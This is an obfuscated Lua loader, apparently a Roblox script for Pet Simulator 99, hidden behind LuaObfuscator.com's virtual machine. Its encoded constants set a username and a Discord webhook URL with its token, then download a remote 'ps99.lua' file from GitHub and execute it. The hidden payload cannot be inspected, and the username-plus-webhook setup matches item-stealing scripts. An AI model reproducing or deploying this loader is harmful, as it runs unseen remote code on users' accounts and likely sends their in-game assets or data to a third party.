--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0) then v110=v5(v81,v19);v19=nil;v109=1;end end else return v81;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-1)) + (2 -1))) ;return v82-(v82%1) ;else local v83=(2256 -(1523 + 114)) -(555 + 64) ;local v84;while true do if (v83==(931 -(857 + 74))) then v84=(570 -(367 + 201))^(v32-(928 -(214 + (1590 -(282 + 595))))) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(0 + 0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=1066 -(68 + 997) ;end if (v34==(1271 -(226 + 1044))) then return v35;end end end local function v22() local v36=(214 -97) -(32 + 85) ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (351 -(87 + 263)) + 1 );v18=v18 + 2 ;v36=958 -(892 + 65) ;end if (v36==(2 -1)) then return (v38 * (472 -216)) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + ((1135 -(802 + 150)) -(67 + 113)) );v18=v18 + 3 + 1 ;return (v42 * (41190819 -24413603)) + (v41 * (48199 + 17337)) + (v40 * (1017 -761)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,2 -1 ,36 -16 ) * (2^(24 + 8))) + v43 ;local v47=v20(v44,21,1028 -(915 + 82) );local v48=((v20(v44,32)==(2 -1)) and  -(1 + 0)) or (1 -(442 -(416 + 26))) ;if (v47==(1187 -(1069 + 118))) then if (v46==(0 -0)) then return v48 * ((0 -0) -0) ;else v47=1 + 0 ;v45=0 -0 ;end elseif (v47==(2031 + 7 + 9)) then return ((v46==((1399 -608) -(368 + 423))) and (v48 * ((3 -2)/0))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/((7 -5)^52))) ;end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==0) then v51=nil;if  not v49 then local v101=438 -(145 + 293) ;while true do if (v101==(430 -(44 + 386))) then v49=v23();if (v49==(1486 -(998 + 488))) then return "";end break;end end end v50=(3 -2) + 0 ;end if (v50==(3 + 0)) then return v6(v52);end if ((774 -(201 + 571))==v50) then v52={};for v91=1139 -((975 -(814 + 45)) + 1022) , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=3;end if (v50==(4 -3)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=7 -5 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 1943 -(1008 + 935) ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (v53~= #"[") then else local v87=(function() return 0;end)();local v88=(function() return;end)();while true do if (v87~=(156 -(142 + 14))) then else v88=(function() return 0;end)();while true do if (v88==(1024 -(706 + 318))) then v58=(function() return v23();end)();v59=(function() return {};end)();v88=(function() return 1252 -(721 + 530) ;end)();end if (v88==(1272 -(945 + 326))) then for v114= #"!",v58 do local v115=(function() return 1793 -(1563 + 230) ;end)();local v116=(function() return;end)();local v117=(function() return;end)();local v118=(function() return;end)();while true do if (v115~=(286 -(134 + 151))) then else v118=(function() return nil;end)();while true do if (v116~=(700 -(271 + 429))) then else local v166=(function() return 1665 -(970 + 695) ;end)();local v167=(function() return;end)();while true do if ((1500 -(1408 + 92))~=v166) then else v167=(function() return 0 -0 ;end)();while true do if (v167~=(1990 -(582 + 1408))) then else v117=(function() return v21();end)();v118=(function() return nil;end)();v167=(function() return 1;end)();end if (v167==(3 -2)) then v116=(function() return  #"[";end)();break;end end break;end end end if (v116== #"\\") then if (v117== #",") then v118=(function() return v21()~=(0 -0) ;end)();elseif (v117==2) then v118=(function() return v24();end)();elseif (v117== #"-19") then v118=(function() return v25();end)();end v59[v114]=(function() return v118;end)();break;end end break;end if (v115==(1171 -(418 + 753))) then v116=(function() return 0 -0 ;end)();v117=(function() return nil;end)();v115=(function() return 1;end)();end end end v57[ #"xnx"]=(function() return v21();end)();v88=(function() return 1826 -(1195 + 629) ;end)();end if ((1 + 1)~=v88) then else v53=(function() return 1 + 1 ;end)();break;end end break;end end end if (v53~=(1 + 1)) then else for v93= #"\\",v23() do local v94=(function() return v21();end)();if (v20(v94, #"!", #",")==(0 -0)) then local v104=(function() return 241 -(187 + 54) ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v104==(782 -(162 + 618))) then while true do if (v105~= #"asd") then else if (v20(v107, #"-19", #"asd")~= #".") then else v108[ #".dev"]=(function() return v59[v108[ #".dev"]];end)();end v54[v93]=(function() return v108;end)();break;end if ((0 + 0)~=v105) then else local v120=(function() return 0;end)();local v121=(function() return;end)();while true do if (v120~=(1322 -(1249 + 73))) then else v121=(function() return 0 + 0 ;end)();while true do if (v121~=1) then else v105=(function() return  #"~";end)();break;end if (v121==(0 + 0)) then v106=(function() return v20(v94,3 -1 , #"xnx");end)();v107=(function() return v20(v94, #"0313",9 -3 );end)();v121=(function() return 1 + 0 ;end)();end end break;end end end if (v105==2) then local v122=(function() return 1636 -(1373 + 263) ;end)();local v123=(function() return;end)();while true do if (v122==(1145 -(466 + 679))) then v123=(function() return 0 -0 ;end)();while true do if (v123==(1000 -(451 + 549))) then if (v20(v107, #"[", #",")~= #"[") then else v108[1 + 1 ]=(function() return v59[v108[2]];end)();end if (v20(v107,1902 -(106 + 1794) ,2 -0 )~= #"{") then else v108[ #"xxx"]=(function() return v59[v108[ #"xnx"]];end)();end v123=(function() return 1 -0 ;end)();end if (v123==1) then v105=(function() return  #"-19";end)();break;end end break;end end end if (v105~= #"}") then else local v124=(function() return 1384 -(746 + 638) ;end)();local v125=(function() return;end)();while true do if ((0 + 0)~=v124) then else v125=(function() return 0 -0 ;end)();while true do if (v125==(0 + 0)) then v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==(0 -0)) then local v184=(function() return 0;end)();local v185=(function() return;end)();while true do if (v184~=(114 -(4 + 110))) then else v185=(function() return 0;end)();while true do if (v185~=(1581 -(1535 + 46))) then else v108[ #"xnx"]=(function() return v22();end)();v108[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v106== #"]") then v108[ #"xxx"]=(function() return v23();end)();elseif (v106==(2 + 0)) then v108[ #"xnx"]=(function() return v23() -(2^16) ;end)();elseif (v106~= #"nil") then else local v190=(function() return 1427 -(41 + 1386) ;end)();local v191=(function() return;end)();while true do if (v190~=(103 -(17 + 86))) then else v191=(function() return 0 + 0 ;end)();while true do if (v191~=(0 + 0)) then else v108[ #"19("]=(function() return v23() -((562 -(306 + 254))^(1 + 15)) ;end)();v108[ #"?id="]=(function() return v22();end)();break;end end break;end end end v125=(function() return 167 -(122 + 44) ;end)();end if (v125~=(1 -0)) then else v105=(function() return 1469 -(899 + 568) ;end)();break;end end break;end end end end break;end if (v104==0) then local v112=(function() return 0 + 0 ;end)();while true do if (v112~=(0 -0)) then else v105=(function() return 603 -(268 + 335) ;end)();v106=(function() return nil;end)();v112=(function() return 1 + 0 ;end)();end if (v112~=1) then else v104=(function() return 1;end)();break;end end end if (v104==(291 -(60 + 230))) then local v113=(function() return 65 -(30 + 35) ;end)();while true do if (v113==(1 + 0)) then v104=(function() return 574 -(426 + 146) ;end)();break;end if (v113~=(0 -0)) then else v107=(function() return nil;end)();v108=(function() return nil;end)();v113=(function() return 1 + 0 ;end)();end end end end end end for v95= #"!",v23() do v55[v95-#"|" ]=(function() return v28();end)();end return v57;end if (v53==0) then local v89=(function() return 1456 -(282 + 1174) ;end)();local v90=(function() return;end)();while true do if (0~=v89) then else v90=(function() return 0;end)();while true do if ((1213 -(323 + 889))==v90) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 2;end)();end if (v90~=2) then else v53=(function() return  #"|";end)();break;end if (v90==0) then v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 812 -(569 + 242) ;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[321 -(53 + 267) ];local v64=v60[1 + 1 ];local v65=v60[3 + 0 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=414 -(15 + 398) ;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -((1004 -(938 + 63)) -2) ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 + 0 ];else v76[v85]=v73[v85 + 1 + 0 ];end end local v77=(v74-v68) + (851 -(16 + 4 + 830)) ;local v78;local v79;while true do local v86=(1125 -(936 + 189)) + 0 ;while true do if ((4012>=2179) and (v86==1)) then if ((4288>3111) and (v79<=(135 -(116 + 10)))) then if (v79<=(1 + 3)) then if ((4160>639) and (v79<=(739 -(542 + 196)))) then if ((1283<=4997) and (v79==(0 -0))) then local v126=0 + 0 ;local v127;local v128;local v129;local v130;while true do if (v126==(0 + 0 + 0)) then v127=v78[1 + 1 ];v128,v129=v69(v76[v127](v13(v76,v127 + (2 -1) ,v78[7 -(1617 -(1565 + 48)) ])));v126=1552 -(1126 + 425) ;end if ((3314>=625) and ((v126==(406 -(118 + 287))) or (3002<2579))) then v71=(v129 + v127) -1 ;v130=0 -0 ;v126=1123 -(73 + 45 + 1003) ;end if ((588<1692) and (v126==2)) then for v173=v127,v71 do v130=v130 + (2 -1) ;v76[v173]=v128[v130];end break;end end else local v131=v78[1140 -(782 + 356) ];local v132=v76[v78[380 -(142 + 235) ]];v76[v131 + (268 -(176 + 91)) ]=v132;v76[v131]=v132[v78[(46 -28) -14 ]];end elseif (v79<=(1 + 1)) then v76[v78[2]]=v62[v78[(1444 -464) -(553 + 424) ]];elseif (v79>(1095 -(975 + 117))) then v76[v78[3 -1 ]]=v62[v78[3 + 0 ]];else local v154=0 + 0 ;local v155;while true do if (v154==(0 + 0)) then v155=v78[1 + 1 ];v76[v155]=v76[v155](v13(v76,v155 + 1 + 0 ,v71));break;end end end elseif (v79<=6) then if (v79>5) then local v138=0 -0 ;local v139;local v140;local v141;local v142;while true do if (v138==(2 -1)) then v71=(v141 + v139) -(2 -1) ;v142=0;v138=(1876 -(157 + 1718)) + 1 + 0 ;end if ((0 -0)==v138) then v139=v78[755 -(239 + 514) ];v140,v141=v69(v76[v139](v13(v76,v139 + 1 + 0 ,v78[3])));v138=(4721 -3391) -((2724 -1927) + 532) ;end if ((v138==(2 + 0)) or (4797<3651)) then for v176=v139,v71 do v142=v142 + 1 + 0 ;v76[v176]=v140[v142];end break;end end else v76[v78[2]]=v78[3];end elseif ((v79<=7) or (4177>4850)) then v62[v78[(1024 -(697 + 321)) -3 ]]=v76[v78[1204 -(373 + 829) ]];elseif ((v79==(739 -(476 + 255))) or (678>4744)) then v70=v78[1133 -(369 + 761) ];else v70=v78[2 + 1 ];end elseif (v79<=14) then if ((4342>3456) and (v79<=(19 -8))) then if ((v79==(18 -8)) or (400>1111)) then v62[v78[241 -(64 + (473 -299)) ]]=v76[v78[3 -1 ]];else do return;end end elseif (v79<=(2 + (23 -13))) then if ((3051>1005) and ((v76[v78[2 -0 ]]==v78[340 -(144 + 192) ]) or (2368>2642))) then v70=v70 + ((85 + 132) -(42 + 174)) ;else v70=v78[3];end elseif ((2105==2105) and (v79==(10 + 3))) then do return;end elseif ((3693<=4382) and (v76[v78[2]]==v78[4])) then v70=v70 + 1 + 0 ;else v70=v78[3];end elseif (v79<=((12 -5) + 9)) then if (v79>(1519 -(363 + 1141))) then v76[v78[2]]();else local v149=(4235 -2655) -((2410 -(322 + 905)) + 397) ;local v150;while true do if (v149==(0 -0)) then v150=v78[2 + 0 ];v76[v150]=v76[v150](v13(v76,v150 + 1 + 0 ,v71));break;end end end elseif (v79<=(1992 -(1913 + 62))) then v76[v78[2 + 0 ]]();elseif ((v79>(47 -29)) or (3282>4100)) then local v159=v78[1935 -(565 + 1368) ];local v160=v76[v78[11 -8 ]];v76[v159 + ((2273 -(602 + 9)) -(1477 + 184)) ]=v160;v76[v159]=v160[v78[5 -(1190 -(449 + 740)) ]];else v76[v78[2 + 0 ]]=v78[3];end v70=v70 + (857 -(564 + 292)) ;break;end if (v86==(0 -0)) then v78=v66[v70];v79=v78[2 -1 ];v86=305 -((1116 -(826 + 46)) + 60) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A616368656D7A686573746F6B69792F782F6D61696E2F70732O392E6C756103083O00557365726E616D65030A3O00417072612O786961595403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135363332333036303538302O38343533312F62494D614658544C616C3271705256555F64422O456835324D69484C4630757864734F7A5830742D34366D364A3470626668524754464E436F74476F6870307257414D7A00143O0012053O00013O00260E3O000B000100020004093O000B0001001204000100033O001204000200043O002013000200020005001205000400066O000200044O000F00013O00022O00110001000100010004093O0013000100260E3O0001000100010004093O00010001001205000100083O00120A000100073O0012050001000A3O00120A000100093O0012053O00023O0004093O000100012O000D3O00017O00",v9(),...);
